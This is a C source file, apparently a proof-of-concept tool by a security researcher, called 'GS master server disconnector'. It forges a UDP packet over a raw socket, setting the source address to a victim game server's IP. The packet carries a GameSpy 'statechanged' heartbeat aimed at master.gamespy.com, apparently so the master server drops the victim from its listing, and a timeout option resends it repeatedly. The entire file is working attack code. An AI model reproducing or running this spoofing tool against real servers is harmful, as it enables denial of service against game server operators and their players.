/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1.2"
#define MSHOST      "master.gamespy.com"
#define MSPORT      27900
#define BUFFSZ      2048
#define DISC        "\\heartbeat\\%hu" \
                    "\\gamename\\%s" \
                    "\\statechanged\\2"
#define IPSZ        sizeof(struct iphdr)
#define UDPSZ       sizeof(struct udphdr)
#define PSEUDOSZ    sizeof(struct pseudohdr)
#define PCKSIZE     (IPSZ + UDPSZ + pcklen)
#define PSSIZE      (PSEUDOSZ + UDPSZ + pcklen)



struct iphdr {
    uint8_t     ihl_ver;
    uint8_t     tos;
    uint16_t    tot_len;
    uint16_t    id;
    uint16_t    frag_off;
    uint8_t     ttl;
    uint8_t     protocol;
    uint16_t    check;
    uint32_t    saddr;
    uint32_t    daddr;
};

struct udphdr {
    uint16_t    source;
    uint16_t    dest;
    uint16_t    len;
    uint16_t    check;
};

struct pseudohdr {
    uint32_t    saddr;
    uint32_t    daddr;
    uint8_t     zero;
    uint8_t     protocol;
    uint16_t    len;
};



uint16_t in_cksum(void *data, int len);
uint32_t resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    struct  iphdr       *ip;
    struct  udphdr      *udp;
    struct  pseudohdr   *pseudo;
    uint32_t    ip_src,
                ip_dst;
    int         sd,
                i,
                pcklen,
                on = 1,
                timeout = 0;
    uint16_t    port_src,
                port_dst;
    uint8_t     buff[BUFFSZ],
                *data;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "GS master server disconnector "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <gamename> <server> <port> [timeout]\n"
            "\n"
            " timeout is the amount of time in seconds before resending the packet\n"
            " by default is sent only one packet and then exits\n"
            " for more informations: http://aluigi.org/papers/msdisc.txt\n"
            "\n", argv[0]);
        exit(1);
    }

#ifndef WIN32
    if(getuid()) {
        printf("\nError: you must be root to use raw sockets, I try to continue\n\n");
    }
#endif


    if(argc > 4) timeout = atoi(argv[4]);

    ip     = (struct iphdr *)buff;
    udp    = (struct udphdr *)(buff + IPSZ);
    data   = (uint8_t *)(buff + IPSZ + UDPSZ);
    pseudo = (struct pseudohdr *)(buff + IPSZ - PSEUDOSZ);

    printf("- resolv hostnames/IPs:\n");
    ip_src           = resolv(argv[2]);
    ip_dst           = resolv(MSHOST);
    port_src         = htons(atoi(argv[3]));
    port_dst         = htons(MSPORT);

    pcklen = sprintf(
        data,
        DISC,
        ntohs(port_src),
        argv[1]);

    pseudo->saddr    = ip_src;
    pseudo->daddr    = ip_dst;
    pseudo->zero     = 0;
    pseudo->protocol = IPPROTO_UDP;
    pseudo->len      = htons(UDPSZ + pcklen);

    udp->source      = port_src;
    udp->dest        = port_dst;
    udp->check       = 0;
    udp->len         = pseudo->len;
    udp->check       = htons(in_cksum(pseudo, PSSIZE));

    ip->ihl_ver      = (4 << 4) | (sizeof(struct iphdr) >> 2);
    ip->tos          = 0x10;
    ip->tot_len      = htons(PCKSIZE);
    ip->id           = htons(1);
    ip->frag_off     = htons(0);
    ip->ttl          = 128;
    ip->protocol     = IPPROTO_UDP;
    ip->check        = 0;
    ip->saddr        = ip_src;
    ip->daddr        = ip_dst;
    ip->check        = htons(in_cksum(ip, IPSZ));

    peer.sin_addr.s_addr = ip_dst;
    peer.sin_port        = port_dst;
    peer.sin_family      = AF_INET;

    printf("- from %15s : %hu\n",
        inet_ntoa(*(struct in_addr *)&(ip->saddr)), ntohs(udp->source));
    printf("- to   %15s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(udp->dest));

    sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if(sd < 0) std_err();
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (void *)&on, sizeof(on))
      < 0) std_err();

    for(;;) {
        if(sendto(sd, buff, PCKSIZE, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        fputc('.', stdout);

        if(!timeout) break;
        for(i = timeout; i; i--) {
            printf("%5d\b\b\b\b\b", i);
            sleep(ONESEC);
        }
    }
    close(sd);

    printf("\nDone\n");
    return(0);
}



uint16_t in_cksum(void *data, int len) {
    uint32_t    sum    = 0;
    int         i      = len >> 1,
                endian = 1; // big endian
    uint16_t    crc,
                *p     = (uint16_t *)data;

    if(*(char *)&endian) endian = 0;
    while(i--) sum += *p++;
    if(len & 1) sum += *p & (endian ? 0xff00 : 0xff);
    crc = sum = (sum >> 16) + (sum & 0xffff);
    if(sum >>= 16) crc += sum;
    if(!endian) crc = (crc >> 8) | (crc << 8);
    return(~crc);
}



uint32_t resolv(char *host) {
    struct      hostent *hp;
    uint32_t    host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(uint32_t *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

